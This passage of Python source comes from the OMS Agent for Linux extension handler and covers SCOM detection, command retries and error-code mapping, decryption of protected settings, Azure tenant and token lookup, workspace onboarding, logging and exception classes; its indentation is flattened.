Otherwise, if a scom configuration directory has been
created, we assume SCOM is in use
"""
scom_port_open = None # return when determine this is false
cert_signed_by_scom = False
if os.path.exists(OMSAdminPath):
scom_port_open = detect_scom_using_omsadmin()
if scom_port_open is False:
return
# If omsadmin.sh option is not available, use omiconfigeditor
if (scom_port_open is None and os.path.exists(OMIConfigEditorPath)
and os.path.exists(OMIServerConfPath)):
scom_port_open = detect_scom_using_omiconfigeditor()
if scom_port_open is False:
return
# If omiconfigeditor option is not available, directly parse omiserver.conf
if scom_port_open is None and os.path.exists(OMIServerConfPath):
scom_port_open = detect_scom_using_omiserver_conf()
if scom_port_open is False:
return
if scom_port_open is None:
hutil_log_info('SCOM port could not be determined to be open')
return
# Parse the certificate to determine if SCOM issued it
if os.path.exists(SCOMCertPath):
exit_if_openssl_unavailable('Install')
cert_cmd = 'openssl x509 -in {0} -noout -text'.format(SCOMCertPath)
cert_exit_code, cert_output = run_get_output(cert_cmd, chk_err = False,
log_cmd = False)
if cert_exit_code is 0:
issuer_re = re.compile(SCOMCertIssuerRegex, re.M)
if issuer_re.search(cert_output):
hutil_log_info('SCOM cert exists and is signed by SCOM server')
cert_signed_by_scom = True
else:
hutil_log_info('SCOM cert exists but is not signed by SCOM ' \
'server')
else:
hutil_log_error('Error reading SCOM cert; cert could not be ' \
'determined to be signed by SCOM server')
else:
hutil_log_info('SCOM cert does not exist')
if scom_port_open and cert_signed_by_scom:
err_msg = ('This machine may already be connected to a System ' \
'Center Operations Manager server. Please set ' \
'stopOnMultipleConnections to false in public settings ' \
'or remove this property to allow connection to the Log ' \
'Analytics workspace. ' \
'(LINUXOMSAGENTEXTENSION_ERROR_MULTIPLECONNECTIONS)')
raise UnwantedMultipleConnectionsException(err_msg)
def detect_scom_using_omsadmin():
"""
This method assumes that OMSAdminPath exists; if packages have not
been installed yet, this may not exist
Returns True if omsadmin.sh indicates that SCOM port is open
"""
omsadmin_cmd = '{0} -o'.format(OMSAdminPath)
exit_code, output = run_get_output(omsadmin_cmd, False, False)
# Guard against older omsadmin.sh versions
if ('illegal option' not in output.lower()
and 'unknown option' not in output.lower()):
if exit_code is 0:
hutil_log_info('According to {0}, SCOM port is ' \
'open'.format(omsadmin_cmd))
return True
elif exit_code is 1:
hutil_log_info('According to {0}, SCOM port is not ' \
'open'.format(omsadmin_cmd))
return False
def detect_scom_using_omiconfigeditor():
"""
This method assumes that the relevant files exist
Returns True if omiconfigeditor indicates that SCOM port is open
"""
omi_cmd = '{0} httpsport -q {1} < {2}'.format(OMIConfigEditorPath,
SCOMPort, OMIServerConfPath)
exit_code, output = run_get_output(omi_cmd, False, False)
# Guard against older omiconfigeditor versions
if ('illegal option' not in output.lower()
and 'unknown option' not in output.lower()):
if exit_code is 0:
hutil_log_info('According to {0}, SCOM port is ' \
'open'.format(omi_cmd))
return True
elif exit_code is 1:
hutil_log_info('According to {0}, SCOM port is not ' \
'open'.format(omi_cmd))
return False
def detect_scom_using_omiserver_conf():
"""
This method assumes that the relevant files exist
Returns True if omiserver.conf indicates that SCOM port is open
"""
with open(OMIServerConfPath, 'r') as omiserver_file:
omiserver_txt = omiserver_file.read()
httpsport_search = r'^[\s]*httpsport[\s]*=(.*)$'
httpsport_re = re.compile(httpsport_search, re.M)
httpsport_matches = httpsport_re.search(omiserver_txt)
if (httpsport_matches is not None and
httpsport_matches.group(1) is not None):
ports = httpsport_matches.group(1)
ports = ports.replace(',', ' ')
ports_list = ports.split(' ')
if str(SCOMPort) in ports_list:
hutil_log_info('SCOM port is listed in ' \
'{0}'.format(OMIServerConfPath))
return True
else:
hutil_log_info('SCOM port is not listed in ' \
'{0}'.format(OMIServerConfPath))
else:
hutil_log_info('SCOM port is not listed in ' \
'{0}'.format(OMIServerConfPath))
return False
def run_command_and_log(cmd, check_error = True, log_cmd = True):
"""
Run the provided shell command and log its output, including stdout and
stderr.
The output should not contain any PII, but the command might. In this case,
log_cmd should be set to False.
"""
exit_code, output = run_get_output(cmd, check_error, log_cmd)
if log_cmd:
hutil_log_info('Output of command "{0}": \n{1}'.format(cmd.rstrip(), output))
else:
hutil_log_info('Output: \n{0}'.format(output))
# also write output to STDERR since WA agent uploads that to Azlinux Kusto DB
# take only the last 100 characters as extension cuts off after that
try:
if exit_code is not 0:
sys.stderr.write(output[-500:])
# For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log
if exit_code is 17:
if "Failed dependencies:" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "waiting for transaction lock" in output or "dpkg: error processing package systemd" in output or "dpkg-deb" in output or "dpkg:" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "Errors were encountered while processing:" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue while processing triggers in systemd. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "Cannot allocate memory" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be insufficient memory for the installation. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif exit_code is 19:
if "rpmdb" in output or "cannot open Packages database" in output or "dpkg (subprocess): cannot set security execution context for maintainer script" in output or "error: dpkg status database is locked by another process" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "libc6 is not installed" in output or "libpam-runtime is not installed" in output or "exited with status 52" in output or "/bin/sh is needed" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif exit_code is 33:
if "Permission denied" in output:
# Enable failures
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to insufficient permissions. Please ensure omsagent user is part of the sudoer file and has sufficient permissions to install. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif exit_code is 5:
if "Reason: InvalidWorkspaceKey" in output or "Reason: MissingHeader" in output:
# Enable failures
# 53 is the exit code for configuration errors
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 53
output = "Installation failed due to incorrect workspace key. Please check if the workspace key is correct. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif exit_code is 8:
if "Check the correctness of the workspace ID and shared key" in output:
# Enable failures
# 53 is the exit code for configuration errors
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 53
output = "Installation failed due to incorrect workspace key. Please check if the workspace key is correct. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
if exit_code is not 0 and exit_code is not 52:
if "dpkg:" in output or "dpkg :" in output or "rpmdb:" in output or "rpm.lock" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
if "conflicts with file from package" in output or "Failed dependencies:" in output or "Please install curl" in output or "is needed by" in output or "check_version_installable" in output or "Error: curl was not installed" in output or "Please install the ctypes package" in output or "gpg is not installed" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
if "Permission denied" in output:
# Enable failures
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to insufficient permissions. Please ensure omsagent user is part of the sudoer file and has sufficient permissions to install. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
except:
hutil_log_info('Failed to write output to STDERR')
return exit_code, output
def run_command_with_retries(cmd, retries, retry_check, final_check = None,
check_error = True, log_cmd = True,
initial_sleep_time = InitialRetrySleepSeconds,
sleep_increase_factor = 1):
"""
Caller provides a method, retry_check, to use to determine if a retry
should be performed. This must be a function with two parameters:
exit_code and output
The final_check can be provided as a method to perform a final check after
retries have been exhausted
Logic used: will retry up to retries times with initial_sleep_time in
between tries
If the retry_check returns True for retry_verbosely, we will try cmd with
the standard -v verbose flag added
"""
try_count = 0
sleep_time = initial_sleep_time
run_cmd = cmd
run_verbosely = False
while try_count <= retries:
if run_verbosely:
run_cmd = cmd + ' -v'
exit_code, output = run_command_and_log(run_cmd, check_error, log_cmd)
should_retry, retry_message, run_verbosely = retry_check(exit_code,
output)
if not should_retry:
break
try_count += 1
hutil_log_info(retry_message)
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if final_check is not None:
exit_code = final_check(exit_code, output)
return exit_code
def run_command_with_retries_output(cmd, retries, retry_check, final_check = None,
check_error = True, log_cmd = True,
initial_sleep_time = InitialRetrySleepSeconds,
sleep_increase_factor = 1):
"""
Caller provides a method, retry_check, to use to determine if a retry
should be performed. This must be a function with two parameters:
exit_code and output
The final_check can be provided as a method to perform a final check after
retries have been exhausted
Logic used: will retry up to retries times with initial_sleep_time in
between tries
If the retry_check retuns True for retry_verbosely, we will try cmd with
the standard -v verbose flag added
"""
try_count = 0
sleep_time = initial_sleep_time
run_cmd = cmd
run_verbosely = False
while try_count <= retries:
if run_verbosely:
run_cmd = cmd + ' -v'
exit_code, output = run_command_and_log(run_cmd, check_error, log_cmd)
should_retry, retry_message, run_verbosely = retry_check(exit_code,
output)
if not should_retry:
break
try_count += 1
hutil_log_info(retry_message)
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if final_check is not None:
exit_code = final_check(exit_code, output)
return exit_code, output
def is_dpkg_locked(exit_code, output):
"""
If dpkg is locked, the output will contain a message similar to 'dpkg
status database is locked by another process'
"""
if exit_code is not 0:
dpkg_locked_search = r'^.*dpkg.+lock.*$'
dpkg_locked_re = re.compile(dpkg_locked_search, re.M)
if dpkg_locked_re.search(output):
return True
return False
def was_curl_found(exit_code, output):
"""
Returns false if exit_code indicates that curl was not installed; this can
occur when package lists need to be updated, or when some archives are
out-of-date
"""
if exit_code is InstallErrorCurlNotInstalled:
return False
return True
def retry_skip(exit_code, output):
"""
skip retires
"""
return False, '', False
def retry_if_dpkg_locked_or_curl_is_not_found(exit_code, output):
"""
Some commands fail because the package manager is locked (apt-get/dpkg
only); this will allow retries on failing commands.
Sometimes curl's dependencies (i.e. libcurl) are not installed; if this
is the case on a VM with apt-get, 'apt-get -f install' should be run
Sometimes curl is not installed and is also not found in the package list;
if this is the case on a VM with apt-get, update the package list
"""
retry_verbosely = False
dpkg_locked = is_dpkg_locked(exit_code, output)
curl_found = was_curl_found(exit_code, output)
apt_get_exit_code, apt_get_output = run_get_output('which apt-get',
chk_err = False,
log_cmd = False)
if dpkg_locked:
return True, 'Retrying command because package manager is locked.', \
retry_verbosely
elif (not curl_found and apt_get_exit_code is 0 and
('apt-get -f install' in output
or 'Unmet dependencies' in output.lower())):
hutil_log_info('Installing all dependencies of curl:')
run_command_and_log('apt-get -f install')
return True, 'Retrying command because curl and its dependencies ' \
'needed to be installed', retry_verbosely
elif not curl_found and apt_get_exit_code is 0:
hutil_log_info('Updating package lists to make curl available')
run_command_and_log('apt-get update')
return True, 'Retrying command because package lists needed to be ' \
'updated', retry_verbosely
else:
return False, '', False
def final_check_if_dpkg_locked(exit_code, output):
"""
If dpkg is still locked after the retries, we want to return a specific
error code
"""
dpkg_locked = is_dpkg_locked(exit_code, output)
if dpkg_locked:
exit_code = DPKGLockedErrorCode
return exit_code
def retry_onboarding(exit_code, output):
"""
Retry under any of these conditions:
- If the onboarding request returns 403: this may indicate that the agent
GUID and certificate should be re-generated
- If the onboarding request returns a different non-200 code: the OMS
service may be temporarily unavailable
- If the onboarding curl command returns an unaccounted-for error code,
we should retry with verbose logging
"""
retry_verbosely = False
if exit_code is EnableErrorOMSReturned403:
return True, 'Retrying the onboarding command to attempt generating ' \
'a new agent ID and certificate.', retry_verbosely
elif exit_code is EnableErrorOMSReturnedNon200:
return True, 'Retrying; the OMS service may be temporarily ' \
'unavailable.', retry_verbosely
elif exit_code is EnableErrorOnboarding:
return True, 'Retrying with verbose logging.', True
return False, '', False
def raise_if_no_internet(exit_code, output):
"""
Raise the CannotConnectToOMSException exception if the onboarding
script returns the error code to indicate that the OMS service can't be
resolved
"""
if exit_code is EnableErrorResolvingHost:
raise CannotConnectToOMSException
return exit_code
def get_settings():
"""
Retrieve the configuration for this extension operation
"""
global SettingsDict
public_settings = None
protected_settings = None
if HUtilObject is not None:
public_settings = HUtilObject.get_public_settings()
protected_settings = HUtilObject.get_protected_settings()
elif SettingsDict is not None:
public_settings = SettingsDict['public_settings']
protected_settings = SettingsDict['protected_settings']
else:
SettingsDict = {}
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
seq_no = get_latest_seq_no()
settings_path = os.path.join(config_dir, '{0}.settings'.format(seq_no))
try:
with open(settings_path, 'r') as settings_file:
settings_txt = settings_file.read()
settings = json.loads(settings_txt)
h_settings = settings['runtimeSettings'][0]['handlerSettings']
public_settings = h_settings['publicSettings']
SettingsDict['public_settings'] = public_settings
except:
hutil_log_error('Unable to load handler settings from ' \
'{0}'.format(settings_path))
if ('protectedSettings' in h_settings
and 'protectedSettingsCertThumbprint' in h_settings
and h_settings['protectedSettings'] is not None
and h_settings['protectedSettingsCertThumbprint'] is not None):
encoded_settings = h_settings['protectedSettings']
settings_thumbprint = h_settings['protectedSettingsCertThumbprint']
encoded_cert_path = os.path.join('/var/lib/waagent',
'{0}.crt'.format(
settings_thumbprint))
encoded_key_path = os.path.join('/var/lib/waagent',
'{0}.prv'.format(
settings_thumbprint))
decoded_settings = base64.standard_b64decode(encoded_settings)
decrypt_cmd = 'openssl smime -inform DER -decrypt -recip {0} ' \
'-inkey {1}'.format(encoded_cert_path,
encoded_key_path)
try:
session = subprocess.Popen([decrypt_cmd], shell = True,
stdin = subprocess.PIPE,
stderr = subprocess.STDOUT,
stdout = subprocess.PIPE)
output = session.communicate(decoded_settings)
except OSError:
pass
protected_settings_str = output[0]
if protected_settings_str is None:
log_and_exit('Enable', 1, 'Failed decrypting ' \
'protectedSettings')
protected_settings = ''
try:
protected_settings = json.loads(protected_settings_str)
except:
hutil_log_error('JSON exception decoding protected settings')
SettingsDict['protected_settings'] = protected_settings
return public_settings, protected_settings
def update_status_file(operation, exit_code, exit_status, message):
"""
Mimic HandlerUtil method do_status_report in case hutil method is not
available
Write status to status file
"""
handler_env = get_handler_env()
try:
extension_version = str(handler_env['version'])
status_dir = str(handler_env['handlerEnvironment']['statusFolder'])
except:
extension_version = "1.0"
status_dir = os.path.join(os.getcwd(), 'status')
status_txt = [{
"version" : extension_version,
"timestampUTC" : time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
"status" : {
"name" : "Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux",
"operation" : operation,
"status" : exit_status,
"code" : exit_code,
"formattedMessage" : {
"lang" : "en-US",
"message" : message
}
}
}]
status_json = json.dumps(status_txt)
# Find the most recently changed config file and then use the
# corresponding status file
latest_seq_no = get_latest_seq_no()
status_path = os.path.join(status_dir, '{0}.status'.format(latest_seq_no))
status_tmp = '{0}.tmp'.format(status_path)
with open(status_tmp, 'w+') as tmp_file:
tmp_file.write(status_json)
os.rename(status_tmp, status_path)
def get_handler_env():
"""
Set and retrieve the contents of HandlerEnvironment.json as JSON
"""
global HandlerEnvironment
if HandlerEnvironment is None:
handler_env_path = os.path.join(os.getcwd(), 'HandlerEnvironment.json')
try:
with open(handler_env_path, 'r') as handler_env_file:
handler_env_txt = handler_env_file.read()
handler_env = json.loads(handler_env_txt)
if type(handler_env) == list:
handler_env = handler_env[0]
HandlerEnvironment = handler_env
except Exception as e:
waagent_log_error(str(e))
return HandlerEnvironment
def get_latest_seq_no():
"""
Determine the latest operation settings number to use
"""
global SettingsSequenceNumber
if SettingsSequenceNumber is None:
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
latest_seq_no = -1
cur_seq_no = -1
latest_time = None
try:
for dir_name, sub_dirs, file_names in os.walk(config_dir):
for file_name in file_names:
file_basename = os.path.basename(file_name)
match = re.match(r'[0-9]{1,10}\.settings', file_basename)
if match is None:
continue
cur_seq_no = int(file_basename.split('.')[0])
file_path = os.path.join(config_dir, file_name)
cur_time = os.path.getmtime(file_path)
if latest_time is None or cur_time > latest_time:
latest_time = cur_time
latest_seq_no = cur_seq_no
except:
pass
if latest_seq_no < 0:
latest_seq_no = 0
SettingsSequenceNumber = latest_seq_no
return SettingsSequenceNumber
def run_get_output(cmd, chk_err = False, log_cmd = True):
"""
Mimic waagent mothod RunGetOutput in case waagent is not available
Run shell command and return exit code and output
"""
if 'Utils.WAAgentUtil' in sys.modules:
# WALinuxAgent-2.0.14 allows only 2 parameters for RunGetOutput
# If checking the number of parameters fails, pass 2
try:
sig = inspect.signature(waagent.RunGetOutput)
params = sig.parameters
waagent_params = len(params)
except:
try:
spec = inspect.getargspec(waagent.RunGetOutput)
params = spec.args
waagent_params = len(params)
except:
waagent_params = 2
if waagent_params >= 3:
exit_code, output = waagent.RunGetOutput(cmd, chk_err, log_cmd)
else:
exit_code, output = waagent.RunGetOutput(cmd, chk_err)
else:
try:
output = subprocess.check_output(cmd, stderr = subprocess.STDOUT,
shell = True)
output = output.decode('latin-1')
exit_code = 0
except subprocess.CalledProcessError as e:
exit_code = e.returncode
output = e.output.decode('latin-1')
output = output.encode('utf-8', 'ignore')
# On python 3, encode returns a byte object, so we must decode back to a string
if sys.version_info >= (3,):
output = output.decode()
return exit_code, output.strip()
def get_tenant_id_from_metadata_api(vm_resource_id):
"""
Retrieve the Tenant ID using the Metadata API of the VM resource ID
Since we have not authenticated, the Metadata API will throw a 401, but
the headers of the 401 response will contain the tenant ID
"""
tenant_id = None
metadata_endpoint = get_metadata_api_endpoint(vm_resource_id)
metadata_request = urllib.request.Request(metadata_endpoint)
try:
# This request should fail with code 401
metadata_response = urllib.request.urlopen(metadata_request)
hutil_log_info('Request to Metadata API did not fail as expected; ' \
'attempting to use headers from response to ' \
'determine Tenant ID')
metadata_headers = metadata_response.headers
except urllib.error.HTTPError as e:
metadata_headers = e.headers
if metadata_headers is not None and 'WWW-Authenticate' in metadata_headers:
auth_header = metadata_headers['WWW-Authenticate']
auth_header_regex = r'authorization_uri=\"https:\/\/login\.windows\.net/(' + GUIDRegex + ')\"'
auth_header_search = re.compile(auth_header_regex)
auth_header_matches = auth_header_search.search(auth_header)
if not auth_header_matches:
raise MetadataAPIException('The WWW-Authenticate header in the ' \
'response does not contain expected ' \
'authorization_uri format')
else:
tenant_id = auth_header_matches.group(1)
else:
raise MetadataAPIException('Expected information from Metadata API ' \
'is not present')
return tenant_id
def get_metadata_api_endpoint(vm_resource_id):
"""
Extrapolate Metadata API endpoint from VM Resource ID
Example VM resource ID: /subscriptions/306ee7f1-3d0a-4605-9f39-ff253cc02708/resourceGroups/LinuxExtVMResourceGroup/providers/Microsoft.Compute/virtualMachines/lagalbraOCUb16C
Corresponding example endpoint: https://management.azure.com/subscriptions/306ee7f1-3d0a-4605-9f39-ff253cc02708/resourceGroups/LinuxExtVMResourceGroup?api-version=2016-09-01
"""
# Will match for ARM and Classic VMs, Availability Sets, VM Scale Sets
vm_resource_id_regex = r'^\/subscriptions\/(' + GUIDRegex + ')\/' \
'resourceGroups\/([^\/]+)\/providers\/Microsoft' \
'\.(?:Classic){0,1}Compute\/(?:virtualMachines|' \
'availabilitySets|virtualMachineScaleSets)' \
'\/[^\/]+$'
vm_resource_id_search = re.compile(vm_resource_id_regex, re.M)
vm_resource_id_matches = vm_resource_id_search.search(vm_resource_id)
if not vm_resource_id_matches:
raise InvalidParameterError('VM Resource ID is invalid')
else:
subscription_id = vm_resource_id_matches.group(1)
resource_group = vm_resource_id_matches.group(2)
metadata_url = 'https://management.azure.com/subscriptions/{0}' \
'/resourceGroups/{1}'.format(subscription_id,
resource_group)
metadata_data = urllib.parse.urlencode({'api-version' : '2016-09-01'})
metadata_endpoint = '{0}?{1}'.format(metadata_url, metadata_data)
return metadata_endpoint
def get_access_token(tenant_id, resource):
"""
Retrieve an OAuth token by sending an OAuth2 token exchange
request to the local URL that the ManagedIdentity extension is
listening to
"""
# Extract the endpoint that the ManagedIdentity extension is listening on
with open(ManagedIdentityExtListeningURLPath, 'r') as listening_file:
listening_settings_txt = listening_file.read()
try:
listening_settings = json.loads(listening_settings_txt)
listening_url = listening_settings['url']
except:
raise ManagedIdentityExtException('Could not extract listening URL ' \
'from settings file')
# Send an OAuth token exchange request
oauth_data = {'authority' : 'https://login.microsoftonline.com/' \
'{0}'.format(tenant_id),
'resource' : resource
}
oauth_request = urllib.request.Request(listening_url + '/oauth2/token',
urllib.parse.urlencode(oauth_data))
oauth_request.add_header('Metadata', 'true')
try:
oauth_response = urllib.request.urlopen(oauth_request)
oauth_response_txt = oauth_response.read()
except urllib.error.HTTPError as e:
hutil_log_error('Request to ManagedIdentity extension listening URL ' \
'failed with an HTTPError: {0}'.format(e))
hutil_log_info('Response from ManagedIdentity extension: ' \
'{0}'.format(e.read()))
raise ManagedIdentityExtException('Request to listening URL failed ' \
'with HTTPError {0}'.format(e))
except:
raise ManagedIdentityExtException('Unexpected error from request to ' \
'listening URL')
try:
oauth_response_json = json.loads(oauth_response_txt)
except:
raise ManagedIdentityExtException('Error parsing JSON from ' \
'listening URL response')
if (oauth_response_json is not None
and 'access_token' in oauth_response_json):
return oauth_response_json['access_token']
else:
raise ManagedIdentityExtException('Could not retrieve access token ' \
'in the listening URL response')
def get_workspace_info_from_oms(vm_resource_id, tenant_id, access_token):
"""
Send a request to the OMS service with the VM information to
determine the workspace the OMSAgent should onboard to
"""
oms_data = {'ResourceId' : vm_resource_id,
'TenantId' : tenant_id,
'JwtToken' : access_token
}
oms_request_json = json.dumps(oms_data)
oms_request = urllib.request.Request(OMSServiceValidationEndpoint)
oms_request.add_header('Content-Type', 'application/json')
retries = 5
initial_sleep_time = AutoManagedWorkspaceCreationSleepSeconds
sleep_increase_factor = 1
try_count = 0
sleep_time = initial_sleep_time
# Workspace may not be provisioned yet; sleep and retry if
# provisioning has been accepted
while try_count <= retries:
try:
oms_response = urllib.request.urlopen(oms_request, oms_request_json)
oms_response_txt = oms_response.read()
except urllib.error.HTTPError as e:
hutil_log_error('Request to OMS threw HTTPError: {0}'.format(e))
hutil_log_info('Response from OMS: {0}'.format(e.read()))
raise OMSServiceOneClickException('ValidateMachineIdentity ' \
'request returned an error ' \
'HTTP code: {0}'.format(e))
except:
raise OMSServiceOneClickException('Unexpected error from ' \
'ValidateMachineIdentity ' \
'request')
should_retry = retry_get_workspace_info_from_oms(oms_response)
if not should_retry:
# TESTED
break
elif try_count == retries:
# TESTED
hutil_log_error('Retries for ValidateMachineIdentity request ran ' \
'out: required workspace information cannot be ' \
'extracted')
raise OneClickException('Workspace provisioning did not complete ' \
'within the allotted time')
# TESTED
try_count += 1
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if not oms_response_txt:
raise OMSServiceOneClickException('Body from ValidateMachineIdentity ' \
'response is empty; required ' \
'workspace information cannot be ' \
'extracted')
try:
oms_response_json = json.loads(oms_response_txt)
except:
raise OMSServiceOneClickException('Error parsing JSON from ' \
'ValidateMachineIdentity response')
if (oms_response_json is not None and 'WorkspaceId' in oms_response_json
and 'WorkspaceKey' in oms_response_json):
return oms_response_json
else:
hutil_log_error('Could not retrieve both workspace ID and key from ' \
'the OMS service response {0}; cannot determine ' \
'workspace ID and key'.format(oms_response_json))
raise OMSServiceOneClickException('Required workspace information ' \
'was not found in the ' \
'ValidateMachineIdentity response')
def retry_get_workspace_info_from_oms(oms_response):
"""
Return True to retry if the response from OMS for the
ValidateMachineIdentity request incidates that the request has
been accepted, but the managed workspace is still being
provisioned
"""
try:
oms_response_http_code = oms_response.getcode()
except:
hutil_log_error('Unable to get HTTP code from OMS repsonse')
return False
if (oms_response_http_code is 202 or oms_response_http_code is 204
or oms_response_http_code is 404):
hutil_log_info('Retrying ValidateMachineIdentity OMS request ' \
'because workspace is still being provisioned; HTTP ' \
'code from OMS is {0}'.format(oms_response_http_code))
return True
else:
hutil_log_info('Workspace is provisioned; HTTP code from OMS is ' \
'{0}'.format(oms_response_http_code))
return False
def init_waagent_logger():
"""
Initialize waagent logger
If waagent has not been imported, catch the exception
"""
try:
waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout', True)
except Exception as e:
print('Unable to initialize waagent log because of exception ' \
'{0}'.format(e))
def waagent_log_info(message):
"""
Log informational message, being cautious of possibility that waagent may
not be imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Log(message)
else:
print('Info: {0}'.format(message))
def waagent_log_error(message):
"""
Log error message, being cautious of possibility that waagent may not be
imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Error(message)
else:
print('Error: {0}'.format(message))
def hutil_log_info(message):
"""
Log informational message, being cautious of possibility that hutil may
not be imported and configured
"""
if HUtilObject is not None:
HUtilObject.log(message)
else:
print('Info: {0}'.format(message))
def hutil_log_error(message):
"""
Log error message, being cautious of possibility that hutil may not be
imported and configured
"""
if HUtilObject is not None:
HUtilObject.error(message)
else:
print('Error: {0}'.format(message))
def log_and_exit(operation, exit_code = 1, message = ''):
"""
Log the exit message and perform the exit
"""
if exit_code is 0:
waagent_log_info(message)
hutil_log_info(message)
exit_status = 'success'
else:
waagent_log_error(message)
hutil_log_error(message)
exit_status = 'failed'
if HUtilObject is not None:
HUtilObject.do_exit(exit_code, operation, exit_status, str(exit_code),
message)
else:
update_status_file(operation, str(exit_code), exit_status, message)
sys.exit(exit_code)
# Exceptions
# If these exceptions are expected to be caught by the main method, they
# include an error_code field with an integer with which to exit from main
class OmsAgentForLinuxException(Exception):
"""
Base exception class for all exceptions; as such, its error code is the
basic error code traditionally returned in Linux: 1
"""
error_code = 1
def get_error_message(self, operation):
"""
Return a descriptive error message based on this type of exception
"""
return '{0} failed with exit code {1}'.format(operation,
self.error_code)
class ParameterMissingException(OmsAgentForLinuxException):
"""
There is a missing parameter for the OmsAgentForLinux Extension
"""
error_code = MissingorInvalidParameterErrorCode
def get_error_message(self, operation):
return '{0} failed due to a missing parameter: {1}'.format(operation,
self)
class InvalidParameterError(OmsAgentForLinuxException):
"""
There is an invalid parameter for the OmsAgentForLinux Extension
ex. Workspace ID does not match GUID regex
"""
error_code = MissingorInvalidParameterErrorCode
def get_error_message(self, operation):
return '{0} failed due to an invalid parameter: {1}'.format(operation,
self)
class UnwantedMultipleConnectionsException(OmsAgentForLinuxException):
"""
This VM is already connected to a different Log Analytics workspace
and stopOnMultipleConnections is set to true
"""
error_code = UnwantedMultipleConnectionsErrorCode
def get_error_message(self, operation):
return '{0} failed due to multiple connections: {1}'.format(operation,
self)
class CannotConnectToOMSException(OmsAgentForLinuxException):
"""
The OMSAgent cannot connect to the OMS service
"""
error_code = CannotConnectToOMSErrorCode # error code to indicate no internet access
def get_error_message(self, operation):
return 'The agent could not connect to the Microsoft Operations ' \
'Management Suite service. Please check that the system ' \
'either has Internet access, or that a valid HTTP proxy has ' \
'been configured for the agent. Please also check the ' \
'correctness of the workspace ID.'
class OneClickException(OmsAgentForLinuxException):
"""
A generic exception for OneClick-related issues
"""
error_code = OneClickErrorCode
